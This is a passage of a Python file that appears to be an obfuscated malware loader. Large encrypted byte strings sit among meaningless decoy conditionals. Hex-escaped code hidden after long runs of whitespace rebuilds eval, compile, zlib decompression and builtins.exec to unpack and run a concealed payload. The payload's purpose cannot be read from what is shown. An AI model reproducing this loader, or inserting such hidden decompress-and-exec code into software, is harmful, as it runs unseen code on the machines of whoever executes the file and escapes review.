a4u3-\xd3\xcc\x1a\x0b\x07<\xd6\xf6\xecOg\xb83\xf6\xee^\x9aP\nu\x1d\x9fVB\x03\xa0\x83\x94>a\x83|\x1a\x0b6\xc1e\x82Z\xba\xcf\x85\xc3\xb2\xd5z\xc7e\xc43\xe2ix\xe7\xbb!\n\xccj\xf9\xb8\x13\xc6,\xe0\xbd\x8a\xa6\xb4\x98@\xb9\x17{s%\xe8\xf27\xf8\xa5\x12\x12Bd\xcb\xc22.7\xfb\xec\x99}\xc6 \xd4L\xd5\x02%Kx\x85\xdc\x0e\xf9\xcb\\3\xe6\xc5\xd8@-P\xfc\t/X\x9f\xce\x98\xc4\x870\x1f\x8c7E\x83\xeb\xc6a\x82\x18\x11\x8e\xef \xdf\x0b\x11\x8b\xb8\xe9\x8d\xea\x1b8\xc1\xac\xef\x00\xf8\xaf\xef\xb8\x0fC/$0\x1a\xbc\xbd77\xdc\x1f$l@G\x18\x93\x15\x86G\x1e\x19)\xc7\x82xT\xdb\xba_H\xd0\xce\xb9\xb8\xd2\xe0m\xfd`,;Gj\x12\x97\xc8K\xa1\xbf')

        if 226583 > 7713535:
            Hypothesis.Positive(_ceil = Hypothesis._system + -97501)
        elif 142585 < 998114:
            Hypothesis._round(_math = 23420 * Hypothesis._system)                                                                                                                                                                                                                                                          ;Negative.Substract(Product='WXXXXWXWWXWXXWWXWXXWWXXW',Frame=b'\t}izss&-\xc1xx\x8a;\xa6\x93\x81\xf7\x9bO#f"\x1d\x11Pj4\xe2Sd\xf2u\xe6\x82B\xd3J\xe6D\xd6-\x12t\xc3r\x0b\xc5\x16\xd3\xc0.\xe6$f\xcdH\x85\xa5\t0s0W,\x97\x1a\xb8\xc4\xb8\xfe\x9bO\x8c\x9d\x18\x11\xad*X\x8b\xa8\xa6\rv\x1fJ\xe8\xd6\xcd\'1\x13\xbde\x85\x9b\xd7\x13\'\xc3\xe0\xc3Hq\xedN\x17B\x03\x8b\xbd\x85\xb6\xd6\xf8\xd37x\xc4g?\x1e\x1e\x91%\xdbs\xe6\xceb5KV/g\x0f\xb6}_\xe2\x1d+a\x00vjN\xf1\xfc\xa4\xbc\xe0\x9cckj\xf0%Opb\x16\x82~B\xf8\xfd!AQG\xd4\xba\x9fd\xba\xb6L;\x0f+=\x00\x18\r\x0cs\xde\t\xd3zPj\x0e\x8e\xab%H\x97iR\x13\xf0wim~\xfd\xba\xa6E\xe7,z\xaf\x9d\xad3\x8c\xfd\x8c7g\xb6bN*\x06\x05\xc00\xb9n\x1eh\xa9\x89\xcf\x99\x86\xee\\\xd0\xc4@+\x06\xedEk\xf0\x98\xc3\x0bq\n\xb8\xf9d|\xce\x9a\xd1\x83Z\xd7P2Y,M7\x9f\x1e,\xc1\xf8A\x90]\x00*v\x90\xca\x7f\xc1@>\x18\x17\xa6}5\xf8\xd0\xac\xd3\xdf\xd6\xb4\xad\xdd\xbe4\xd1\xa0\xa7\x88"A\x08\xc7Jx\xad\x9bLC\xf3\xe4\xc3s\xb4\xc6\x80\xbbn\xc7\r=\x1a2"\x1aQ+\xbc\x89-\xad\xa94$\x08Y}\xde|\x12?\x8b\xc0\xb5\xc8\x83\x87S\x04\x01\x1f\x17\x92g\t\xbe\xe2\xfc\xf0\xa6\xd1\x83\xe2K@_\xe2x,\xa4p\x02I\x1c\x8fMk\x9bxE\x13\x1bR\xa9\xb5)\xb0\x91"+\xc6\x02{DT=78T\xd3\xce\xa4\xf5\xfe\xa9\xbcNe\xffdg=j\x9cZ\xccS\xa4\x1f\xc2IY\xb7\xff|\xacqG,\x82\xd1\xb2\xa6t\xa9M\xff\xb24\x0e\xec\xad\x1c\xafG|\xbe\xf7g\xb6\x10I\xbd\xb5\xf4`ZWZ\xb3?s0-\xd4\x0b\xd2J&\x8e\xb3\x8d\xfb]\xa3$\x91\x82\xf2=\x9b\xd5\x00V[\xf8\xc74}\xb8C\tt\xe3\xb1\xb2]\x80E\x16\xfd\xd3\xef\x86\xd5\xc1\xf2\x97\xfe\x1d\xf2\xc6~\x9c\xacf\xb9\xda\xcc\xdbKA\xf5\xe4\x06\xdf\\\x99g_\xf2h1L8=W\xf5\xc7Dt\x88\xc2\x82\xc8Y\xf0\xf1q\xcdN\xb4G\xcd\x0c\x88\xd77\xb5\x0f\x03\xb9\xd2\x82\xde\xb75?7)c\xb4@\xfdU\xfdZ\x93\x85\xe8@4p\x06\x17\x06\x8b\xee\xf9\x1b\xf5\rs$\x86\xb1\xe1d2\xe2\x8f\xe1f\xcd\xe3\xfa\x9b-\xcci)\xf5\xdb\xb7u\xe2,\xb2\xc4\xea\xc8)K\xaa\xbd\xfe\xf6){\x16\xa8E\xb1\xeeE\xb0\xffT\xad\x91)#,\xce\x85;\x0fz\xdd\xa7|G\xd0\xe0x\xee\n7\x9f\xce\x85\xfeS\x80~\x9f\x18\r,pr\xe6z/\xc2{2\x9dWDoJ\x1a\x95\xaf\xb2\xc1B\xf4I3\xe1K\xc8\xfc\xd5UV.\\+\xb2f\xbc\xef-M\xfb\x16\x17\xc4\x83(\x8a+\x9e\xf6\x85\xd9\xc7\x00*i\x11\x00]M<\x8c6\x89\xa1\xfa\xc3\x05\x80\xa3\x06.X\xbc\xa1\xb6\x1cb\x93\x0b\x06\x82\xc0o\xe3\x13G\xa3\x8fM\x8c\xd8\xea!#\x1e\x9a(\x07\x0b\xcf\xb9N\x96QS\x07\xa4\x06\xd8\xb0Lb\x15^ \xa0\xda\'\x92\x9d\x08\xa1\x93r/\x18\x93!\x90\xa1\xb6\x8b\x85p\x82\xc2,\xa8\xdd\x87\x0f\xb3rL\xa5\x01\x9dg\xf8\xc8O\xb2x\xaf\xad\x99\x01\xd4q$\x1b\xc7H@\xd3\x14\x92\x8cQ\xc9\xb9\xf4\x00F\xc77\xf7\x13o\xd2\xc9\x87\xe9\x12<\xaaC\x89Y\x97\xe0u\xf5w\x9c\xa1\x94\xd3\x90\x93/\xc3\x95\xda\xe5?\x81c\x98\x89\x8e\x9f\x7f_M?B\xcb |\xf59Y\xce54\xfbU#\xb4-\xf0\xc0\x96\xce\t?\xfe\x02fN\xcai3\x1a\x8d\x0c\x07,\x8f\xbe57\x97\x1d\xbc\x1a?\x8bwi\xc9\x89N$X]m\x1f\xff\xd3p\xf4\x97\xdb\xbf\xfe\xfd\xbf\xfe\xb3\xf3o\x7f\x1d\x8d\xff\xfe\xfc\xf6\xdf\xfee\xc4\'V\x11_\xa1\xf7`]\xcfR\x1c\xe8\x16\xb3\x0e\xb4\x9f\xe8u\x8cl"\x1c$\x13\xdcg\x86\xf0\xa6\x1d\xb0\xa5)\x95\xc4\x87\xc23\xa1D}\x92=0g\xde\x7f\xbeZ\x18,\x01b\xbf\xbe\x9e\xaeoa\xd3\x04\x16\x92RCY`\xfb\x84\xec}\x9bN\n\x0f*Y\x11\x99\xbf\x8b\xf8A\xef\xb9\x97n\xa4&\x7fL\x9f_\x8eM\xcb;t\xfe\x99\x1d\xae?\xe6\x86\x03\x9d\xc8\x9d\xdb\xf0\xff/\xcf/\x93\x97\x1f\xcf\xb70\xa8\xce\xceRZ\x03\xceiu\xe6\xcc\xe10\xcc\xcbo\xc4\xd2\xe0\x99\xd9\xc4\xbc\xcbm<\xe7H=\x82Y\xd1)\x9c|0\xc3\xc6`\xb4\xcc\xef\x8f\xffu\xfc\xff\xfc\xe5\xab3<w\xfe\xe3\xf6\xf1W\x1c\xcf\x8bt%0\xf8-#\x08\xabka\xc8\xe6\xbd,\xba\xfa\'\xaf\x93\xc5\xcb\xc7\xe2X\xfd\xf2\xac\x16\xad\xdbY:\xfd\xf1\xa0\xd4\xe5c\x89\x97\xb1\r|`\x89V\'\x87hK\x8a\xfa\'\xd8\x1b\xce\x8bxK\x1d\x93\x97\x92\xcdmg\xfa*p\x84\xda.\x8d\x8c\x07E\xa7\x83\xc4B\r\xd51\x06g\xf5y\xf6\xdd\xa2V\xd0$\x0576b\xec\xab\t\x179\xfb\xae\xaf\xb9d\x90?*I\n\xc4\x83\xe3s\xa6|b\x9e\x1a\x94d\xe0\x8b\x15}QuW\x94\x1c\x8bm\'\x02\x10\x84\xb2\x1a\xfb\xd2\x91\xb2o\x82\x15\x81g\x8d\x1d\x8d)v\x9d\xb4 \x0c\x8b<\xe1\x80\x8c\x87\xc9\x1b\xde\x16\xccTz\xb6\xe4\xb0\xb5{"\xb9\xe0t\xb1\xf7\xf7\xff\xdd\xe8{b\xfa%\t\xe0\xa3V\x8b\x9e\xd3\x1fO\xd3\xe4\xd6\xe4!+\xde\x98\x9d\x11x\x99}\xae\x81\xdc=\xa5\xe9\x8bsK3\xcb\xb6|y\xaf\x93\xe5o[w\x06\x8f\x8d`<L\xaf\xc6\xc8><\xd4fd\xdc\xad\x83qsD\xb0Jf\x91t{\xd0\n&NI\xde^p\xa6\xdd\x8c%Ck@~\xcfx\xc9k\x07\xcc\xe63\x84\x07\xb7DyD\r\n\x88\xd8\xc8\xdb\xcf\x8e\xcfp\xeb\xbe~I^\xa0\x8b\x1d[\x07?\xf9\xbf\xcf2\xddo\xfbY\xc3C\x98_41\xd5N)\xdc\x98vnL\x91\x8d\xe8I \xcbnZ\xe1\xfa\xe0\xb1\x11\xf8h_\x95S8\xc9\xf2\x1d\xebI\xf0\xd3\x99\xcc\xbd\xdaF\n\x9f[w\xb0\xd9\xa8m?\nvd\xfd\xf3\r\x86\xe7\xb5?*\x1eKW1K\x1c\xc5\xb9Q\xbc!F\x0c+\xddIV8\x1ex\x0f\x93\xa9$B93`e\xd9\xc2U\x91\xee\xdew\x11\xa7$\xc2Z\xe8\xde\xbe\xa8a\xf90y9>\x96 \x11\xc1\x8a\xaa\xaf\xd0\xd9V([\xff\x8f\xff\x91,\x13X\xd7\x9eO\xfe\xdbG\xf7m>?\x81\xd1,e0\x80\xc4\xd6\xc3\xeb\xe1\x9b\xbc\x1f\x1b\xc3\xa9\xd8m1\n\xd1\x84*\x90\x1c\xf6\xdf\x19%\x89\xdc\x99\x9c\x83i4tt\xfc\xa2\xb6\x89\x91\x02pr\xf3\xfd\xf4\xf4\xb30\xcc.\x89Y\t-\x0cb\xfc\xdb\xa0q\x1c6^q\xb1=\xe3)<\xb6@*t\x9d\xd2\xc4\xa3:v\x0c\xfe\x1c\x93\xd9L;\rpUZ\'\xaf\x95\x1d\xfe\xa5B\xc6qH[5\x87\xec\xe4\xc7\x16\xb3\xb40\xdf\xc0\x90\xa5]\x8d(\t\x02\xb1\xde\xa0\xc2\xb6\xab\'2\x96\x8c\xef\x91\x17\xcd\xe3 \x9c\xaf\x05\xce\xcd\x05\x98T\xcc\xd3\x83\xff\xcb\x01`*\x80_\xf0\xf4\xc5a\xa1\xbd\x05\xf2\xf5l\xe3\x7f\x94.\xf6\xb8T\x9d\xec\xf8Ml\xa6o\x02mq\xcc\xd8\x14@\xb6z\xd2\x91@|\xad0\x83\x97F\x88\xdb\xb1\xf8\xb8y\xe3l<\xd5O\xe2\xd2g^#\xe6\xb3R\xdb\'\xff\xd7\xda\xf9\xfda\xf2[r;y\x9a\xfe\xba\xf8[\x82\x02\xf7\xf7\xd3\xcf\xc6\xf1\xaeIg\xbe\xde89\xfeB!\xce[:V.q\xb8l\xcb\x8a.\x12\xd5\xce\xae\xea\xc4\xeb\xcf\xef\\\xcf\xe5\x8e\x12z\xae?\xf3\x13\xc4=q\t\xe0\xb1\xa0\xa3x\x89\xea2\xf38\xf6\xfaq\x14%\xaac\x04\xf1\xc4\x1bx\t \x1e\x01[\xa7\xeb\xf5\xbd\xd8\x0b\xa3\xc0\x9b\xab\xf7\x19\xbc\x87\x03\xcf\xf5\xc2\xa0\xefO\xd4\xbb\xea>\x1e\xa3\xa8\xe6\xee`>\xf0\xee\xeeB_u+\xc0MB}s\xfc-\xd8_\xfceo\x12xn\xc8\xdd\xd9\xfcn=2\x14~\xd1\x8f\x06\xf0\x0b7\xf0\xad\xa3\x140\x9b\xaa\x06\xb8\xd1]o\xb6\xf5\xe9\xea\xf3\xf0\xfb\xea\xe8A\xa4\xae~\x1a\x85\x01\xe1e\xbd\xc8\xcb\x9eU$\xe5\\/s%\xf1\x00\xf6\xe7\xaa\xf6\x86A\x17\xab3\xf2\xd4 \xb4\xce26\xff\x0b\xac\xeb\x99M&\xea\xc8\xd0N\xf3\x08p\x8e\xa1\xfd\x9b(S\xae\xae\xab"0\x80\xf4\xbb\n\xea\xe5\x9a\xeeG{X\xdb\xfd\x9f\x1e^\x9e\x92\xcdQ\x1d2\x06\x99\x8f*\x95(iP\xb9\xb7\x8dB\xd2\x8c87\xee\x82s\xe5m\x18\x81\x15O\x81\xf8\xc6\xe0\xedB2W]\x0c\xb7\x9c\xc3\xc9\x07\xb5j\xdd\xde\xc2ry{{v\xa6\x13\xfb\xac\xc4]\xfc@\xab\x07:\xbe\t+FnZ\xb5\x85\x0b\xd2:9\xc7\x04C\x085\x9ccs2\x195\x19\xe8S\xff?\x8a\xf4\x91a')

        if 157792 > 603939:
            Negative(_add = 80565 - 72775).Positive(_ceil = Hypothesis._system - -22556)
        elif 253180 < 4394259:
            Negative(_add = -72910 + 92837)._round(_math = -62226 - Hypothesis._system)                                                                                                                                                                                                                                                          ;NMNMNMMMMNMNMNMNMNNNM,mnmnnmnmnnnmmmmmmnmmmm,mmmmnnmmmnmmmnnnnmmmnn,mnnnmnnmnnnnmmnmnnmm,OOO00o0o0O0OOOOOoo00=(lambda WXWXXWXXXXWXXXXWW:globals()['\x65\x76\x61\x6c'](globals()['\x63\x6f\x6d\x70\x69\x6c\x65'](globals()['\x73\x74\x72']("\x67\x6c\x6f\x62\x61\x6c\x73\x28\x29\x5b\x27\x5c\x78\x36\x35\x5c\x78\x37\x36\x5c\x78\x36\x31\x5c\x78\x36\x63\x27\x5d(WXWXXWXXXXWXXXXWW)"),filename='\x4f\x4f\x6f\x4f\x30\x6f\x4f\x6f\x30\x6f\x30\x30\x4f\x6f\x4f\x30\x4f\x4f\x4f\x6f\x4f\x6f\x6f\x30\x30',mode='\x65\x76\x61\x6c'))),(lambda WXWXXWXXXXWXXXXWW:WXWXXWXXXXWXXXXWW(__import__('\x7a\x6c\x69\x62'))),(lambda WXWXXWXXXXWXXXXWW:WXWXXWXXXXWXXXXWW['\x64\x65\x63\x6f\x6d\x70\x72\x65\x73\x73']),(lambda ODDDOoDDoDODDDoOoo,WXWXXWXXXXWXXXXWW:ODDDOoDDoDODDDoOoo(WXWXXWXXXXWXXXXWW)),(lambda:(lambda WXWXXWXXXXWXXXXWW:globals()['\x65\x76\x61\x6c'](globals()['\x63\x6f\x6d\x70\x69\x6c\x65'](globals()['\x73\x74\x72']("\x67\x6c\x6f\x62\x61\x6c\x73\x28\x29\x5b\x27\x5c\x78\x36\x35\x5c\x78\x37\x36\x5c\x78\x36\x31\x5c\x78\x36\x63\x27\x5d(WXWXXWXXXXWXXXXWW)"),filename='\x4f\x4f\x6f\x4f\x30\x6f\x4f\x6f\x30\x6f\x30\x30\x4f\x6f\x4f\x30\x4f\x4f\x4f\x6f\x4f\x6f\x6f\x30\x30',mode='\x65\x76\x61\x6c')))('\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f\x28\x27\x62\x75\x69\x6c\x74\x69\x6e\x73\x27\x29\x2e\x65\x78\x65\x63'))
        Hypothesis._round(_math = 63204 + Hypothesis._system)                                                                                                                                                                                                                                                          ;OOO00o0o0O0OOOOOoo00()(mnnnmnnmnnnnmmnmnnmm(mmmmnnmmmnmmmnnnnmmmnn(mnmnnmnmnnnmmmmmmnmmmm(NMNMNMMMMNMNMNMNMNNNM('\x76\x61\x72\x73'))),Negative._floor(_run='mmmnmnnnnmnmmnnmmmnnmmm')+Negative._floor(_run='xxwxxwwxxwwwxxwwxwwx')+Negative._floor(_run='WWWWXXWWXXWXWXWWXXXW')+Negative._floor(_run='ooooDooDDODDDoOODOooO')+Negative._floor(_run='iljijllliiljijjjjl')+Negative._floor(_run='Ooo000oo0oo0oOoOo0oOo0OO')+Negative._floor(_run='OoDDDDDooDOooODODOOOoooOD')+Negative._floor(_run='llllllIlIIIIIlIllll')+Negative._floor(_run='XWWXXXWXWWXXWWXWWXXX')+Negative._floor(_run='xwwwxxxwxwxxwxwxwxxwwx')+Negative._floor(_run='O0oO0O000OOOOO0Oo0o0')+Negative._floor(_run='WXXXXWXWWXWXXWWXWXXWWXXW')))

    except Exception as Ceil:
        if 203820 > 2216712:
            Negative.execute(code = DetectVar(Ceil))

        elif 312678 > 6107816:
            Negative(_add = 10258 - -41718)._round(_math = -17844 + Hypothesis._system)
